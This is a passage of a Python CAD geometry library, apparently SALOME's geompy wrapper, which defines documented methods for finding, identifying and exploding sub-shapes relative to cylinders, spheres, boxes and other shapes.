# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnCylinderWithLocation "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnCylinderWithLocation(self, theShape, theShapeType, theAxis, thePnt, theRadius, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified cylinder in a certain way, defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAxis Vector (or line, or linear edge), specifying
axis of the cylinder to find shapes on.
thePnt Point specifying location of the bottom of the cylinder.
theRadius Radius of the cylinder to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnCylinderWithLocation(theShape, theShapeType, theAxis, thePnt, theRadius, theState)
RaiseIfFailed("GetShapesOnCylinderWithLocation", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnCylinder")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified cylinder in a certain way, defined through the \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAxis Vector (or line, or linear edge), specifying
# axis of the cylinder to find shapes on.
# @param thePnt Point specifying location of the bottom of the cylinder.
# @param theRadius Radius of the cylinder to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices
#
# @ref swig_GetShapesOnCylinderWithLocationIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnCylinderWithLocationIDs(self, theShape, theShapeType, theAxis, thePnt, theRadius, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified cylinder in a certain way, defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAxis Vector (or line, or linear edge), specifying
axis of the cylinder to find shapes on.
thePnt Point specifying location of the bottom of the cylinder.
theRadius Radius of the cylinder to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnCylinderWithLocationIDs(theShape, theShapeType, theAxis, thePnt, theRadius, theState)
RaiseIfFailed("GetShapesOnCylinderWithLocationIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified sphere in a certain way, defined through the \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theCenter Point, specifying center of the sphere to find shapes on.
# @param theRadius Radius of the sphere to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnSphere "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnSphere(self, theShape, theShapeType, theCenter, theRadius, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified sphere in a certain way, defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theCenter Point, specifying center of the sphere to find shapes on.
theRadius Radius of the sphere to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnSphere(theShape, theShapeType, theCenter, theRadius, theState)
RaiseIfFailed("GetShapesOnSphere", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnSphere")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified sphere in a certain way, defined through the \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theCenter Point, specifying center of the sphere to find shapes on.
# @param theRadius Radius of the sphere to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnSphereIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnSphereIDs(self, theShape, theShapeType, theCenter, theRadius, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified sphere in a certain way, defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theCenter Point, specifying center of the sphere to find shapes on.
theRadius Radius of the sphere to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnSphereIDs(theShape, theShapeType, theCenter, theRadius, theState)
RaiseIfFailed("GetShapesOnSphereIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified quadrangle in a certain way, defined through the \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theTopLeftPoint Point, specifying top left corner of a quadrangle
# @param theTopRigthPoint Point, specifying top right corner of a quadrangle
# @param theBottomLeftPoint Point, specifying bottom left corner of a quadrangle
# @param theBottomRigthPoint Point, specifying bottom right corner of a quadrangle
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnQuadrangle "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnQuadrangle(self, theShape, theShapeType,
theTopLeftPoint, theTopRigthPoint,
theBottomLeftPoint, theBottomRigthPoint, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified quadrangle in a certain way, defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theTopLeftPoint Point, specifying top left corner of a quadrangle
theTopRigthPoint Point, specifying top right corner of a quadrangle
theBottomLeftPoint Point, specifying bottom left corner of a quadrangle
theBottomRigthPoint Point, specifying bottom right corner of a quadrangle
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnQuadrangle(theShape, theShapeType,
theTopLeftPoint, theTopRigthPoint,
theBottomLeftPoint, theBottomRigthPoint, theState)
RaiseIfFailed("GetShapesOnQuadrangle", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnQuadrangle")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified quadrangle in a certain way, defined through the \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theTopLeftPoint Point, specifying top left corner of a quadrangle
# @param theTopRigthPoint Point, specifying top right corner of a quadrangle
# @param theBottomLeftPoint Point, specifying bottom left corner of a quadrangle
# @param theBottomRigthPoint Point, specifying bottom right corner of a quadrangle
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnQuadrangleIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnQuadrangleIDs(self, theShape, theShapeType,
theTopLeftPoint, theTopRigthPoint,
theBottomLeftPoint, theBottomRigthPoint, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified quadrangle in a certain way, defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theTopLeftPoint Point, specifying top left corner of a quadrangle
theTopRigthPoint Point, specifying top right corner of a quadrangle
theBottomLeftPoint Point, specifying bottom left corner of a quadrangle
theBottomRigthPoint Point, specifying bottom right corner of a quadrangle
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnQuadrangleIDs(theShape, theShapeType,
theTopLeftPoint, theTopRigthPoint,
theBottomLeftPoint, theBottomRigthPoint, theState)
RaiseIfFailed("GetShapesOnQuadrangleIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified \a theBox in a certain way, defined through the \a theState parameter.
# @param theBox Shape for relative comparing.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnBox "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnBox(self, theBox, theShape, theShapeType, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified theBox in a certain way, defined through the theState parameter.
Parameters:
theBox Shape for relative comparing.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnBox(theBox, theShape, theShapeType, theState)
RaiseIfFailed("GetShapesOnBox", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnBox")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified \a theBox in a certain way, defined through the \a theState parameter.
# @param theBox Shape for relative comparing.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnBoxIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnBoxIDs(self, theBox, theShape, theShapeType, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified theBox in a certain way, defined through the theState parameter.
Parameters:
theBox Shape for relative comparing.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnBoxIDs(theBox, theShape, theShapeType, theState)
RaiseIfFailed("GetShapesOnBoxIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType,
# situated relative to the specified \a theCheckShape in a
# certain way, defined through the \a theState parameter.
# @param theCheckShape Shape for relative comparing. It must be a solid.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnShape "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnShape(self, theCheckShape, theShape, theShapeType, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relative to the specified theCheckShape in a
certain way, defined through the theState parameter.
Parameters:
theCheckShape Shape for relative comparing. It must be a solid.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnShape(theCheckShape, theShape,
theShapeType, theState)
RaiseIfFailed("GetShapesOnShape", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnShape")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType,
# situated relative to the specified \a theCheckShape in a
# certain way, defined through the \a theState parameter.
# @param theCheckShape Shape for relative comparing. It must be a solid.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return All found sub-shapes as compound.
#
# @ref swig_GetShapesOnShapeAsCompound "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnShapeAsCompound(self, theCheckShape, theShape, theShapeType, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relative to the specified theCheckShape in a
certain way, defined through the theState parameter.
Parameters:
theCheckShape Shape for relative comparing. It must be a solid.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
All found sub-shapes as compound.
"""
# Example: see GEOM_TestOthers.py
anObj = self.ShapesOp.GetShapesOnShapeAsCompound(theCheckShape, theShape,
theShapeType, theState)
RaiseIfFailed("GetShapesOnShapeAsCompound", self.ShapesOp)
self._autoPublish(anObj, theName, "shapeOnShape")
return anObj
## Find in \a theShape all sub-shapes of type \a theShapeType,
# situated relative to the specified \a theCheckShape in a
# certain way, defined through the \a theState parameter.
# @param theCheckShape Shape for relative comparing. It must be a solid.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnShapeIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnShapeIDs(self, theCheckShape, theShape, theShapeType, theState):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relative to the specified theCheckShape in a
certain way, defined through the theState parameter.
Parameters:
theCheckShape Shape for relative comparing. It must be a solid.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnShapeIDs(theCheckShape, theShape,
theShapeType, theState)
RaiseIfFailed("GetShapesOnShapeIDs", self.ShapesOp)
return aList
## Get sub-shape(s) of theShapeWhere, which are
# coincident with \a theShapeWhat or could be a part of it.
# @param theShapeWhere Shape to find sub-shapes of.
# @param theShapeWhat Shape, specifying what to find.
# @param isNewImplementation If True, use the new implementation of the GetInPlace functionality
#        (default = False: the old algorithm, based on shape properties).
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Group of all found sub-shapes or a single found sub-shape.
#
# @note This function has a restriction on argument shapes.
# If \a theShapeWhere has curved parts with significantly
# outstanding centres (i.e. the mass centre of a part is closer to
# \a theShapeWhat than to the part), such parts will not be found.
# @image html get_in_place_lost_part.png
#
# @ref swig_GetInPlace "Example"
@ManageTransactions("ShapesOp")
def GetInPlace(self, theShapeWhere, theShapeWhat, isNewImplementation = False, theName=None):
"""
Get sub-shape(s) of theShapeWhere, which are
coincident with theShapeWhat or could be a part of it.
Parameters:
theShapeWhere Shape to find sub-shapes of.
theShapeWhat Shape, specifying what to find.
isNewImplementation If True, use the new implementation of the GetInPlace functionality
                    (default = False: the old algorithm, based on shape properties).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Group of all found sub-shapes or a single found sub-shape.
Note:
This function has a restriction on argument shapes.
If theShapeWhere has curved parts with significantly
outstanding centres (i.e. the mass centre of a part is closer to
theShapeWhat than to the part), such parts will not be found.
"""
# Example: see GEOM_TestOthers.py
anObj = None
if isNewImplementation:
anObj = self.ShapesOp.GetInPlace(theShapeWhere, theShapeWhat)
else:
anObj = self.ShapesOp.GetInPlaceOld(theShapeWhere, theShapeWhat)
pass
RaiseIfFailed("GetInPlace", self.ShapesOp)
self._autoPublish(anObj, theName, "inplace")
return anObj
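# Hedged usage sketch (illustrative; `geompy` as above): locate a partition
# tool inside the partition result.
#
#   big   = geompy.MakeBoxDXDYDZ(100, 100, 100)
#   tool  = geompy.MakeBoxDXDYDZ(100, 100, 50)
#   part  = geompy.MakePartition([big], [tool])
#   found = geompy.GetInPlace(part, tool, True, "toolInPart")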
## Get sub-shape(s) of \a theShapeWhere, which are
# coincident with \a theShapeWhat or could be a part of it.
#
# Implementation of this method is based on a saved history of an operation,
# that produced \a theShapeWhere. The \a theShapeWhat must be among this operation's
# arguments (an argument shape or a sub-shape of an argument shape).
# The operation could be the Partition or one of boolean operations,
# performed on simple shapes (not on compounds).
#
# @param theShapeWhere Shape to find sub-shapes of.
# @param theShapeWhat Shape, specifying what to find (must be in the
# building history of the ShapeWhere).
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Group of all found sub-shapes or a single found sub-shape.
#
# @ref swig_GetInPlace "Example"
@ManageTransactions("ShapesOp")
def GetInPlaceByHistory(self, theShapeWhere, theShapeWhat, theName=None):
"""
Implementation of this method is based on a saved history of an operation,
that produced theShapeWhere. The theShapeWhat must be among this operation's
arguments (an argument shape or a sub-shape of an argument shape).
The operation could be the Partition or one of boolean operations,
performed on simple shapes (not on compounds).
Parameters:
theShapeWhere Shape to find sub-shapes of.
theShapeWhat Shape, specifying what to find (must be in the
building history of the ShapeWhere).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Group of all found sub-shapes or a single found sub-shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.ShapesOp.GetInPlaceByHistory(theShapeWhere, theShapeWhat)
RaiseIfFailed("GetInPlaceByHistory", self.ShapesOp)
self._autoPublish(anObj, theName, "inplace")
return anObj
## Get sub-shape of \a theShapeWhere, which is
# equal to \a theShapeWhat.
# @param theShapeWhere Shape to find sub-shape of.
# @param theShapeWhat Shape, specifying what to find.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object for found sub-shape.
#
# @ref swig_GetSame "Example"
@ManageTransactions("ShapesOp")
def GetSame(self, theShapeWhere, theShapeWhat, theName=None):
"""
Get sub-shape of theShapeWhere, which is
equal to theShapeWhat.
Parameters:
theShapeWhere Shape to find sub-shape of.
theShapeWhat Shape, specifying what to find.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object for found sub-shape.
"""
anObj = self.ShapesOp.GetSame(theShapeWhere, theShapeWhat)
RaiseIfFailed("GetSame", self.ShapesOp)
self._autoPublish(anObj, theName, "sameShape")
return anObj
## Get indices of the sub-shape of \a theShapeWhere, which is
# equal to \a theShapeWhat.
# @param theShapeWhere Shape to find sub-shape of.
# @param theShapeWhat Shape, specifying what to find.
# @return List of all found sub-shapes indices.
#
# @ref swig_GetSame "Example"
@ManageTransactions("ShapesOp")
def GetSameIDs(self, theShapeWhere, theShapeWhat):
"""
Get indices of the sub-shape of theShapeWhere, which is
equal to theShapeWhat.
Parameters:
theShapeWhere Shape to find sub-shape of.
theShapeWhat Shape, specifying what to find.
Returns:
List of all found sub-shapes indices.
"""
anObj = self.ShapesOp.GetSameIDs(theShapeWhere, theShapeWhat)
RaiseIfFailed("GetSameIDs", self.ShapesOp)
return anObj
# end of l4_obtain
## @}
## @addtogroup l4_access
## @{
## Obtain a composite sub-shape of <VAR>aShape</VAR>, composed from sub-shapes
# of aShape, selected by their unique IDs inside <VAR>aShape</VAR>
# @param aShape Shape to get sub-shape of.
# @param ListOfID List of sub-shapes indices.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Found sub-shape.
#
# @ref swig_all_decompose "Example"
def GetSubShape(self, aShape, ListOfID, theName=None):
"""
Obtain a composite sub-shape of aShape, composed from sub-shapes
of aShape, selected by their unique IDs inside aShape
Parameters:
aShape Shape to get sub-shape of.
ListOfID List of sub-shapes indices.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Found sub-shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.AddSubShape(aShape,ListOfID)
self._autoPublish(anObj, theName, "subshape")
return anObj
## Obtain the unique ID of sub-shape <VAR>aSubShape</VAR> inside <VAR>aShape</VAR>.
# @param aShape Shape to get sub-shape of.
# @param aSubShape Sub-shape of aShape.
# @return ID of found sub-shape.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("LocalOp")
def GetSubShapeID(self, aShape, aSubShape):
"""
Obtain the unique ID of sub-shape aSubShape inside aShape.
Parameters:
aShape Shape to get sub-shape of.
aSubShape Sub-shape of aShape.
Returns:
ID of found sub-shape.
"""
# Example: see GEOM_TestAll.py
anID = self.LocalOp.GetSubShapeIndex(aShape, aSubShape)
RaiseIfFailed("GetSubShapeIndex", self.LocalOp)
return anID
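# Hedged round-trip sketch (illustrative; `geompy` as above): explode a shape,
# take one sub-shape's unique ID, then rebuild the same sub-shape from that ID:
#
#   box   = geompy.MakeBoxDXDYDZ(10, 10, 10)
#   faces = geompy.SubShapeAll(box, geompy.ShapeType["FACE"])
#   fid   = geompy.GetSubShapeID(box, faces[0])
#   same  = geompy.GetSubShape(box, [fid], "face_by_id")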
## Obtain unique IDs of sub-shapes <VAR>aSubShapes</VAR> inside <VAR>aShape</VAR>
# This function is provided for performance purposes. The complexity is O(n),
# where n is the number of sub-objects of aShape.
# @param aShape Shape to get sub-shape of.
# @param aSubShapes Sub-shapes of aShape.
# @return list of IDs of found sub-shapes.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def GetSubShapesIDs(self, aShape, aSubShapes):
"""
Obtain a list of IDs of sub-shapes aSubShapes inside aShape
This function is provided for performance purposes. The complexity is O(n),
where n is the number of sub-objects of aShape.
Parameters:
aShape Shape to get sub-shape of.
aSubShapes Sub-shapes of aShape.
Returns:
List of IDs of found sub-shapes.
"""
# Example: see GEOM_TestAll.py
anIDs = self.ShapesOp.GetSubShapesIndices(aShape, aSubShapes)
RaiseIfFailed("GetSubShapesIndices", self.ShapesOp)
return anIDs
# end of l4_access
## @}
## @addtogroup l4_decompose
## @{
## Get all sub-shapes and groups of \a theShape,
# that were created already by any other methods.
# @param theShape Any shape.
# @param theGroupsOnly If this parameter is TRUE, only groups will be
# returned, else all found sub-shapes and groups.
# @return List of existing sub-objects of \a theShape.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def GetExistingSubObjects(self, theShape, theGroupsOnly = False):
"""
Get all sub-shapes and groups of theShape,
that were created already by any other methods.
Parameters:
theShape Any shape.
theGroupsOnly If this parameter is TRUE, only groups will be
returned, else all found sub-shapes and groups.
Returns:
List of existing sub-objects of theShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.GetExistingSubObjects(theShape, theGroupsOnly)
RaiseIfFailed("GetExistingSubObjects", self.ShapesOp)
return ListObj
## Get all groups of \a theShape,
# that were created already by any other methods.
# @param theShape Any shape.
# @return List of existing groups of \a theShape.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def GetGroups(self, theShape):
"""
Get all groups of theShape,
that were created already by any other methods.
Parameters:
theShape Any shape.
Returns:
List of existing groups of theShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.GetExistingSubObjects(theShape, True)
RaiseIfFailed("GetExistingSubObjects", self.ShapesOp)
return ListObj
## Explode a shape on sub-shapes of a given type.
# If the shape itself matches the type, it is also returned.
# @param aShape Shape to be exploded.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of sub-shapes of type theShapeType, contained in theShape.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def SubShapeAll(self, aShape, aType, theName=None):
"""
Explode a shape on sub-shapes of a given type.
If the shape itself matches the type, it is also returned.
Parameters:
aShape Shape to be exploded.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of sub-shapes of type theShapeType, contained in theShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.MakeAllSubShapes(aShape, EnumToLong( aType ), False)
RaiseIfFailed("SubShapeAll", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
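# Hedged usage sketch (illustrative; `geompy` as above):
#
#   box   = geompy.MakeBoxDXDYDZ(10, 10, 10)
#   edges = geompy.SubShapeAll(box, geompy.ShapeType["EDGE"])    # 12 edges
#   verts = geompy.SubShapeAll(box, geompy.ShapeType["VERTEX"])  # 8 vertices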
## Explode a shape on sub-shapes of a given type.
# @param aShape Shape to be exploded.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @return List of IDs of sub-shapes.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def SubShapeAllIDs(self, aShape, aType):
"""
Explode a shape on sub-shapes of a given type.
Parameters:
aShape Shape to be exploded.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
Returns:
List of IDs of sub-shapes.
"""
ListObj = self.ShapesOp.GetAllSubShapesIDs(aShape, EnumToLong( aType ), False)
RaiseIfFailed("SubShapeAllIDs", self.ShapesOp)
return ListObj
## Obtain a compound of sub-shapes of <VAR>aShape</VAR>,
# selected by their indices in the list of all sub-shapes of type <VAR>aType</VAR>.
# Each index is in range [1, Nb_Sub-Shapes_Of_Given_Type]
# @param aShape Shape to get sub-shape of.
# @param ListOfInd List of sub-shapes indices.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return A compound of sub-shapes of aShape.
#
# @ref swig_all_decompose "Example"
def SubShape(self, aShape, aType, ListOfInd, theName=None):
"""
Obtain a compound of sub-shapes of aShape,
selected by their indices in the list of all sub-shapes of type aType.
Each index is in range [1, Nb_Sub-Shapes_Of_Given_Type]
Parameters:
aShape Shape to get sub-shape of.
ListOfInd List of sub-shapes indices.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
A compound of sub-shapes of aShape.
"""
# Example: see GEOM_TestAll.py
ListOfIDs = []
AllShapeIDsList = self.SubShapeAllIDs(aShape, EnumToLong( aType ))
for ind in ListOfInd:
ListOfIDs.append(AllShapeIDsList[ind - 1])
# note: auto-publishing is done in self.GetSubShape()
anObj = self.GetSubShape(aShape, ListOfIDs, theName)
return anObj
## Explode a shape on sub-shapes of a given type.
# Sub-shapes will be sorted taking into account their gravity centers,
# to provide stable order of sub-shapes.
# If the shape itself matches the type, it is also returned.
# @param aShape Shape to be exploded.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of sub-shapes of type theShapeType, contained in theShape.
#
# @ref swig_SubShapeAllSorted "Example"
@ManageTransactions("ShapesOp")
def SubShapeAllSortedCentres(self, aShape, aType, theName=None):
"""
Explode a shape on sub-shapes of a given type.
Sub-shapes will be sorted taking into account their gravity centers,
to provide stable order of sub-shapes.
If the shape itself matches the type, it is also returned.
Parameters:
aShape Shape to be exploded.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of sub-shapes of type theShapeType, contained in theShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.MakeAllSubShapes(aShape, EnumToLong( aType ), True)
RaiseIfFailed("SubShapeAllSortedCentres", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
## Explode a shape on sub-shapes of a given type.
# Sub-shapes will be sorted taking into account their gravity centers,
# to provide stable order of sub-shapes.
# @param aShape Shape to be exploded.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @return List of IDs of sub-shapes.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def SubShapeAllSortedCentresIDs(self, aShape, aType):
"""
Explode a shape on sub-shapes of a given type.
Sub-shapes will be sorted taking into account their gravity centers,
to provide stable order of sub-shapes.
Parameters:
aShape Shape to be exploded.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
Returns:
List of IDs of sub-shapes.
"""
ListIDs = self.ShapesOp.GetAllSubShapesIDs(aShape, EnumToLong( aType ), True)
RaiseIfFailed("SubShapeAllIDs", self.ShapesOp)
return ListIDs
## Obtain a compound of sub-shapes of <VAR>aShape</VAR>,
